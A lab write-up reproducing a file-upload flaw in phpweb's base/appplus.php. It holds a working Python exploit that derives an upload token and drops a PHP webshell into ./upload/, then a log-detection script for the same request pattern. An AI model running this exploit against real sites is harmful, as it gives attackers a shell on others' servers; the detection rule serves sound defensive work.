Environment setup
Setting up the phpweb environment is straightforward: it is essentially a matter of clicking Next through the installer.
Before installing, create the database that phpweb will use, as shown in the figure:
Then keep clicking Next in the front-end installer until it reports that the installation succeeded:
Front end: http://192.168.242.128/phpweb/3151/
Back end: http://192.168.242.128/phpweb/3151/admin.php
Reproduction:
The vulnerability is in the ./base/appplus.php file; reproduce it with the exp:
python poc.py http://192.168.242.128/phpweb/3151
As shown in the figure, the EXP creates a one-line webshell named x.php with password pp under the site's ./upload/ directory; connecting to it directly with Caidao (中国菜刀) gives a shell:
**EXP:**
```python
# coding: utf-8
# author: print("")
import os
import re
import sys

import requests


def Md5(strings):
    """Return the hex MD5 digest of a string (the app signs uploads with md5(k + t))."""
    import hashlib
    m = hashlib.md5()
    m.update(strings.encode('utf-8'))
    return m.hexdigest()


def get_key(uri):
    """Ask base/post.php (act=appcode) for the k and t values and derive the upload token."""
    try:
        data = requests.post(url=uri, data={"act": "appcode"}, timeout=10).text
        k = re.findall('k=(.*)&', data)[0]
        t = re.findall('t=(.*)', data)[0]
        return {"md5": Md5(k + t), "t": t}
    except Exception:
        print('fail to connect to server')
        return None


def send_shell():
    # Write the one-line webshell to x.php. The shell body was not preserved in
    # the original post, so the file content is left empty here.
    data = open('x.php', 'w')
    data.write('')
    data.close()


def upload():
    send_shell()
    get_key22 = get_key(uri)
    if get_key22 is None:
        sys.exit(1)
    # act=upload with the md5(k + t) token, t, the target path and the file size
    with open('x.php', 'rb') as fh:
        files = {'file': fh}
        data = {'act': 'upload', 'm': get_key22['md5'], 't': get_key22['t'],
                "path": 'upload', 'r_size': os.path.getsize('x.php')}
        try:
            r = requests.post(url=upload_url, files=files, data=data, timeout=10).text
            print(r)
        except Exception:
            print('fail to connect to server')


if __name__ == '__main__':
    if len(sys.argv) < 2:
        sys.exit('example: python phpweb_rce.py http://127.0.0.1')
    url = sys.argv[1].rstrip('/')
    uri = url + '/base/post.php'
    upload_url = url + '/base/appplus.php'
    upload()
```
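The write-up above describes the request sequence the exploit produces: a POST to base/post.php (act=appcode) to obtain k and t, then a POST to base/appplus.php that drops a PHP file into ./upload/, followed by requests to that file. The following script, added here as an example and not part of the original post or of phpweb, turns that sequence into a detection over web-server access logs. It parses Apache combined-format lines and flags (1) a POST to base/appplus.php that follows a POST to base/post.php from the same client within a short window, and (2) any successful request for a .php file under an upload/ directory. The log lines, IPs and timestamps are constructed for the example.

```python
"""Detect the phpweb appplus.php upload pattern in access logs (added example)."""
import re
from datetime import datetime, timedelta

# Constructed sample log lines in Apache combined format (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [10/Jun/2021:12:00:01 +0800] "POST /phpweb/3151/base/post.php HTTP/1.1" 200 58 "-" "python-requests/2.25.1"
10.0.0.5 - - [10/Jun/2021:12:00:02 +0800] "POST /phpweb/3151/base/appplus.php HTTP/1.1" 200 12 "-" "python-requests/2.25.1"
10.0.0.5 - - [10/Jun/2021:12:00:09 +0800] "POST /phpweb/3151/upload/x.php HTTP/1.1" 200 1043 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Jun/2021:12:03:00 +0800] "GET /phpweb/3151/index.php HTTP/1.1" 200 4021 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
# PHP-executable extensions that must never be served from the upload directory.
UPLOAD_PHP_RE = re.compile(r"/upload/[^/]+\.(php|phtml|phar)$")


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["path"] = rec["path"].split("?", 1)[0].lower()  # drop query string, normalise case
    return rec


def detect(log_text, window_seconds=60):
    """Return a list of (rule, client_ip, path) findings for the upload pattern."""
    findings = []
    last_appcode = {}  # client ip -> time of its last POST to base/post.php
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None:
            continue
        ip, path, ts = rec["ip"], rec["path"], rec["ts"]
        if rec["method"] == "POST" and path.endswith("/base/post.php"):
            last_appcode[ip] = ts
        elif rec["method"] == "POST" and path.endswith("/base/appplus.php"):
            prev = last_appcode.get(ip)
            if prev is not None and ts - prev <= timedelta(seconds=window_seconds):
                # token fetch immediately followed by the upload endpoint: exploit signature
                findings.append(("appplus_upload_after_appcode", ip, path))
            else:
                findings.append(("appplus_upload", ip, path))
        if rec["status"] == "200" and UPLOAD_PHP_RE.search(path):
            # a PHP file is being executed out of the upload directory
            findings.append(("php_executed_from_upload_dir", ip, path))
    return findings


if __name__ == "__main__":
    for rule, ip, path in detect(SAMPLE_LOG):
        print(f"{rule}\t{ip}\t{path}")
```

The second rule is the durable one: whatever the upload vector, the web server should not execute scripts from ./upload/ at all, so a 200 for a .php path in that directory is worth alerting on and is also the configuration fix (deny script execution in the upload directory) that closes this class of issue.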